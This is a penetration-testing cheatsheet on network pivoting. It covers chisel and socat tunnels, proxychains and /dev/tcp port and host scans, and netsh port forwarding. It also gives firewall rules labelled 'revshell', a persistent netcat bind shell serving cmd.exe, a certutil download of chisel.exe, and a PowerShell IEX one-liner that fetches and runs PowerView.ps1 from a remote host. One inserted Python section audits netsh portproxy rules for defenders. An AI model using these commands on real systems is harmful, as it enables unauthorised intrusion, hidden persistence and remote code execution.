# Pivoting

### Chisel

#### Server

```bash
./chisel server --reverse -p 8000
```

#### Client

```bash
./chisel client 10.10.10.5:8000 R:3000:127.0.0.1:3000
./chisel client 10.10.10.5:8000 R:4444:socks
```

### Socat

```bash
./socat tcp-listen:2222,fork,reuseaddr tcp:10.10.10.5:8000 &
```

Expose a local port

```bash
socat TCP-LISTEN:8282,fork TCP:127.0.0.1:8080 &
```

> In this case, port `8080` is not exposed outside the local machine, but with the command above we expose it externally through port `8282`.

### Port scanning

Port scan through proxychains, running the probes in parallel with `xargs`

```bash
seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -p{} --open -T5 -Pn -n 10.10.10.16 -vvv -oN targeted 2>&1 | grep "tcp open"
```

### Windows host discovery

```cmd
arp -d
for /L %a in (1,1,254) do @start /b ping 40.40.40.%a -w 100 -n 2 >nul
arp -a
```

### Linux host discovery

```bash
#!/bin/bash
# Usage: ./host-discovery.sh 192.168.1.0
# Takes the first three octets of the given address and pings every host of that /24.

octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}')

for i in $(seq 1 254); do
    timeout 1 bash -c "ping -c 1 $octetos.$i" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" &
done; wait
```

```bash
./host-discovery.sh 192.168.1.0
```

### Linux host discovery (alternative)

If the machine does not have the `ping` utility, we can use the following script as an alternative:

```bash
#!/bin/bash
# Usage: ./host-discovery.sh 192.168.1.0
# Uses bash's /dev/tcp pseudo-device to attempt a TCP connection to port 80 of every host in the /24.

octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}')

for i in $(seq 1 254); do
    timeout 1 bash -c "echo >/dev/tcp/$octetos.$i/80" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" &
done
wait
```

```bash
./host-discovery.sh 192.168.1.0
```

### Linux open-port discovery

```bash
#!/bin/bash
# Usage: ./port-discovery.sh 192.168.1.10
# Attempts a TCP connection to every port of the given host through /dev/tcp.

for port in $(seq 1 65535); do
    timeout 1 bash -c "echo '' > /dev/tcp/$1/$port" 2>/dev/null && echo "[+] Port $port - OPEN" &
done; wait
```

```bash
./port-discovery.sh 192.168.1.10
```

### Netsh

#### Show the current port-forwarding configuration

```powershell
netsh interface portproxy show all
```

#### Port Forwarding

```powershell
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=5555 connectaddress=20.20.20.2
```
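The `show all` and `add v4tov4` commands above are what a defender needs to audit: a `portproxy` rule that listens on every interface and forwards to another host is exactly the pivot shown here. The following is an added example, not part of the original cheatsheet, that parses the table printed by `netsh interface portproxy show all` and flags such rules. The sample output is constructed for the example (the layout follows netsh, the addresses are invented), and the function names `parse_portproxy` and `suspicious_rules` are the example's own.

```python
"""Audit `netsh interface portproxy show all` output for forwarders that expose
a port to the network. Added example; the sample output below is constructed."""
import ipaddress
import re

# Constructed sample in the layout netsh prints; the entries are invented.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        20.20.20.2      5555
127.0.0.1       8080        127.0.0.1       8081
*               3389        10.10.10.6      3389
"""

# Listen addresses that mean "every interface" in netsh output.
WILDCARDS = {"*", "0.0.0.0", "::"}

# A data row is: <addr> <port> <addr> <port>; headers and separators do not match.
ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text):
    """Return one dict per portproxy rule found in the netsh table text."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # title lines, column headers, dashes, blanks
        listen_addr, listen_port, connect_addr, connect_port = m.groups()
        rules.append({
            "listen_addr": listen_addr,
            "listen_port": int(listen_port),
            "connect_addr": connect_addr,
            "connect_port": int(connect_port),
        })
    return rules


def is_loopback(addr):
    """True only for a literal loopback IP; hostnames and wildcards count as external."""
    if addr in WILDCARDS:
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def suspicious_rules(rules):
    """Rules that listen on all interfaces or forward traffic off the local host."""
    return [
        r for r in rules
        if r["listen_addr"] in WILDCARDS or not is_loopback(r["connect_addr"])
    ]


def report(text):
    """Human-readable lines for each suspicious rule in the given netsh output."""
    return [
        f"[!] {r['listen_addr']}:{r['listen_port']} -> {r['connect_addr']}:{r['connect_port']}"
        for r in suspicious_rules(parse_portproxy(text))
    ]


if __name__ == "__main__":
    for line in report(SAMPLE_OUTPUT):
        print(line)
```

On a real host, feed the script the output of `netsh interface portproxy show all`; the same rules are also persisted under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, so that key is worth checking when `netsh` itself cannot be trusted, and `netsh interface portproxy reset` clears every rule.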

#### Open ports in the firewall

```powershell
# Inbound rule
netsh advfirewall firewall add rule name=revshell protocol=TCP dir=in localport=4444 action=allow
# Outbound rule
netsh advfirewall firewall add rule name=revshell protocol=TCP dir=out localport=4444 action=allow
```

### Set up "persistence" on Windows

We send the process to the background, opening a port so that we can get access more easily later.

```cmd
start "" /B nc.exe -l -p 10000 -e cmd.exe
```

```bash
# Connect to the listener through the proxy (the destination port is a positional argument, not -p)
proxychains rlwrap nc 10.10.10.6 10000
```

### Download a file from Windows (cmd)

```cmd
certutil -split -urlcache -f http://192.168.1.11/chisel.exe chisel.exe
```

### Download a file from Windows (PowerShell)

```powershell
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10/PowerView.ps1')
```
